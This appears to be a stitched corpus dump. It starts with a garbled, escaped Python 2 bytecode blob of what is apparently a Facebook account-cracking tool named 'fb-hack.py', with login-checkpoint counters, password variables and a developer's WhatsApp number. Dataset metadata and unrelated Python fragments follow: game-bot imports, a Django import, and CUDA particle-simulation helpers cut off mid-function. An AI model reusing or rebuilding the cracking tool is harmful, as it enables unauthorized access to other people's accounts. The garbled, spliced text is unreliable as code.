\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x18\x04\x03\x01i\x1e\x00\x00\x00s\xaa\x00\x00\x00\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91mB4\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s=\x00\x00\x00 \x1b[1;91m\xc2\xab---\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2---Developed By Shabir--\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2---\xc2\xbbse\x00\x00\x00\x1b[1;93m\xe2\x9c\x85Process Has Been Completed Press\xe2\x9e\xa1 Ctrl+Z.\xe2\x86\xa9 Next Type (python2 fb-hack.py)\xe2\x86\xa9\x1b[1;97m....s*\x00\x00\x00\x1b[1;91mTotal OK/\x1b[1;95mCP \x1b[1;93m: \x1b[1;91ms\x0f\x00\x00\x00\x1b[1;93m/\x1b[1;95ms-\t\x00\x00\n \xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$s\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6s$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.$$$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.$$$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb3$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$\xc2\xb3\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb3$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$\xc2\xb3\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6..$$$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$$$..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6..$$$..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..$$$..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6..\xc2\xb6..\xc2\xb6..\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6.\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6..\xc2\xb6\xc2\xb6\xc2\xb6\xc2\xb6\xe2\x80\xa6\xe2\x80\xa6..\n \n LOGIN CHECKPOINT ACCOUNT AFTER 8 DAYS\n\n\xe2\x80\xa2\x1b[1;95m\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2.\n: \x1b[1;91m ...\xf0\x9d\x94\xb8\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9e\xf0\x9d\x95\x9a\xf0\x9d\x95\x9f \xf0\x9d\x95\x80\xf0\x9d\x95\xa4\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9e....... \x1b[1;95m :\n\xe2\x80\xa2\x1b[1;95m\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2.\' \n WhatsApp Number\n \x1b[1;91m +923232132362(\x1c\x00\x00\x00RH\x00\x00\x00Rm\x00\x00\x00R\x05\x00\x00\x00RB\x00\x00\x00RG\x00\x00\x00R!\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00R`\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00Ra\x00\x00\x00R\x80\x00\x00\x00RE\x00\x00\x00Rl\x00\x00\x00RD\x00\x00\x00R\x18\x00\x00\x00R\x0f\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00mapR\x7f\x00\x00\x00R\x81\x00\x00\x00(\x0c\x00\x00\x00t\x04\x00\x00\x00peakR)\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00st\x03\x00\x00\x00idtt\x03\x00\x00\x00jokt\x02\x00\x00\x00opR\x14\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x8f\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>Rm\x00\x00\x00\x08\x01\x00\x00sp\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\x05\x01\n\x01\x13\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x05\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x05\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\n\x02\x05\x01\x07\x02\x15\x01\n\x01\x0f\x01\r\x01\x08\x00\r\x00\x11\x01\x05\x01\x05\x01\n\x01\x05\x03\t\xd5\x0c\x01\x10\x01\x05\x01\x05\x01\x05\x01)#\x05\x02\n\x01t\x08\x00\x00\x00__main__(7\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1d\x00\x00\x00t\x08\x00\x00\x00datetimeR\r\x00\x00\x00RS\x00\x00\x00t\x02\x00\x00\x00ret\t\x00\x00\x00threadingRY\x00\x00\x00R|\x00\x00\x00t\t\x00\x00\x00cookielibRW\x00\x00\x00RJ\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRI\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RG\x00\x00\x00R$\x00\x00\x00t\x04\x00\x00\x00backt\x08\x00\x00\x00berhasilR\x81\x00\x00\x00R\x7f\x00\x00\x00Ra\x00\x00\x00t\x08\x00\x00\x00listgrupt\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnRB\x00\x00\x00t\x0f\x00\x00\x00CorrectUsernamet\x0f\x00\x00\x00CorrectPasswordt\x04\x00\x00\x00loopRH\x00\x00\x00t\x08\x00\x00\x00usernameR0\x00\x00\x00R\x1e\x00\x00\x00R_\x00\x00\x00RD\x00\x00\x00Ri\x00\x00\x00Rl\x00\x00\x00Rm\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x08\x00\x00\x00sd\x00\x00\x00\x9c\x01\x10\x01\x10\x01\x10\x03\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x12\x03\t\x05\t\x08\t\n\t*\x06\x02\t\x06\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\r\x08\x05\x01\n\x01\x05\x02\x06\x01\x06\x02\x06\x01\x0f\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\t\x01\r\x01\t\x02\x05\x01\x10\x02\x05\x01\x11\x02\t=\t#\t\x10\t\x11\t\xff\x004\x0c\x01')) | 8,011.375 | 63,812 | 0.746283 | 15,007 | 64,091 | 3.183115 | 0.050177 | 0.118194 | 0.077247 | 0.099981 | 0.794825 | 0.74831 | 0.695828 | 0.663129 | 0.643869 | 0.6217 | 0 | 0.371415 | 0.006023 | 64,091 | 8 | 63,812 | 8,011.375 | 0.378432 | 0.003932 | 0 | 0 | 0 | 3.5 | 0.703356 | 0.630416 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 13 |
849f9c85bda46ea1ab0bb2030ab8909d2d4656bd | 210 | py | Python | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 48 | 2019-11-25T20:02:27.000Z | 2022-02-28T00:16:21.000Z | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 48 | 2020-03-10T17:08:04.000Z | 2022-02-22T08:21:12.000Z | sharpy-sc2/sharpy/plans/terran.py | ProfessorQu/Sharpy-Bot | a8bf7ebbed113f5bf0f6891c9ca45fac9edfb26e | [
"MIT"
] | 25 | 2019-12-01T18:14:54.000Z | 2022-03-24T01:14:53.000Z | from sharpy.plans import *
from sharpy.plans.acts import *
from sharpy.plans.require import *
from sharpy.plans.acts.terran import *
from sharpy.plans.tactics import *
from sharpy.plans.tactics.terran import *
| 30 | 41 | 0.795238 | 31 | 210 | 5.387097 | 0.258065 | 0.359281 | 0.538922 | 0.628743 | 0.634731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 210 | 6 | 42 | 35 | 0.897849 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ca0233ac8906ef90cb1701ed4f0218f3e174da6f | 58 | py | Python | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | 1 | 2015-12-14T17:16:04.000Z | 2015-12-14T17:16:04.000Z | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | null | null | null | django_extended/utils/date/__init__.py | dalou/django-extended | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | [
"BSD-3-Clause"
] | null | null | null | from .format_date_range_html import format_date_range_html | 58 | 58 | 0.931034 | 10 | 58 | 4.8 | 0.6 | 0.416667 | 0.625 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051724 | 58 | 1 | 58 | 58 | 0.872727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
047ee2af1c145c4dc14eefcdf2257e3652accddf | 39,526 | py | Python | cuHelper.py | zijieli-Jlee/FGN | f707ed31687ea355ab62a1eaf43b5756a6ed883e | [
"MIT"
] | 2 | 2022-02-28T07:36:47.000Z | 2022-03-10T04:45:57.000Z | cuHelper.py | BaratiLab/FGN | 04729eaebfa8395a7d2ebb275761f98dc0342933 | [
"MIT"
] | null | null | null | cuHelper.py | BaratiLab/FGN | 04729eaebfa8395a7d2ebb275761f98dc0342933 | [
"MIT"
] | null | null | null | import numba as nb
import numpy as np
from numba import cuda
from Constants import COL_COEF, DT, BASE_RADIUS
import math
import cupy as cp
import time
THREADS = 256
@cuda.jit(device=True)
def weight(r, re):
if r < 1e-8:
return 0.0
else:
return (re/r) - 1.
@cuda.jit('float32(float32[:, :], int32, int32)', device=True)
def distance(pos, i, j):
rx = pos[i, 0] - pos[j, 0]
ry = pos[i, 1] - pos[j, 1]
rz = pos[i, 2] - pos[j, 2]
return math.sqrt(rx**2 + ry**2 + rz**2)
@cuda.jit('boolean(float32[:, :], float32[:], int32)', device=True)
def check_in_range(pos, boundary, i):
rx = pos[i, 0]
ry = pos[i, 1]
rz = pos[i, 2]
max_x, min_x, max_y, min_y, max_z, min_z = \
boundary[0], boundary[1], boundary[2], boundary[3], boundary[4], boundary[5]
return (min_x < rx < max_x and
min_y < ry < max_y and
min_z < rz < max_z)
@cuda.jit(device=True)
def __get_neighbor_min__(val, pos, cell_fst, cell_next, boundary,
i, control_radius, nx, nxy):
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
val_min = val[i]
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius:
if val[j] < val_min:
val_min = val[j]
j = cell_next[j]
if j == -1:
break
return val_min
@cuda.jit
def cu_init_int_array(arr, param, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
arr[i] = param
@cuda.jit
def cu_init_float_array(arr, param, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
arr[i] = param
@nb.njit
def __check_in_range__(pos, boundary, i):
rx = pos[i, 0]
ry = pos[i, 1]
rz = pos[i, 2]
max_x, min_x, max_y, min_y, max_z, min_z = \
boundary[0], boundary[1], boundary[2], boundary[3], boundary[4], boundary[5]
return (min_x < rx < max_x and
min_y < ry < max_y and
min_z < rz < max_z)
@nb.njit
def cell_sort(pos, boundary, control_radius, nx, nxy, nxyz, tot_num):
cell_fst = -np.ones((nxyz, ), dtype=np.int32)
cell_lst = -np.ones((nxyz, ), dtype=np.int32)
cell_next = -np.ones((tot_num, ), dtype=np.int32)
for i in range(tot_num):
if not __check_in_range__(pos, boundary, i):
continue
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
cell_idx = iz * nxy + iy * nx + ix
j = cell_lst[cell_idx]
cell_lst[cell_idx] = i
if j == -1:
